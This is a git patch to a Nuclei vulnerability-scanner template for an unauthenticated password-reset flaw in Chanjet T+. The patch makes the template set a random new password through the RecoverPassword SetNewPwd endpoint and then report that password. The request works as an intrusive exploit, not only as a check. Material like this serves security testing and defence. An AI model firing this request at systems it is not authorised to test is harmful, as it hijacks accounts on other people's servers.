From da6554fe507669d2cba81866824934fe7130bc00 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Wed, 28 Feb 2024 09:58:47 +0530
Subject: [PATCH] Update chanjet-tplus-unauth-update.yaml

---
 .../chanjet-tplus/chanjet-tplus-unauth-update.yaml    | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)

diff --git a/http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-update.yaml b/http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-update.yaml
index 91f11a4c65..8d6373cadf 100644
--- a/http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-update.yaml
+++ b/http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-update.yaml
@@ -11,13 +11,17 @@ info:
     verified: true
   tags: tplus,unauth,chanjet,intrusive
 
+variables:
+  password: '{{randstr}}'
+  hash: '{{md5("{{password}}")}}'
+
 http:
   - method: GET
     path:
       - "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"
 
     body: |
-      {"pwdNew":"{{md5(randstr)}}"}
+      {"pwdNew":"{{hash}}"}
 
     matchers-condition: and
     matchers:
@@ -34,3 +38,8 @@ http:
       - type: status
         status:
           - 200
+
+    extractors:
+      - type: dsl
+        dsl:
+          - '"Password: " + password'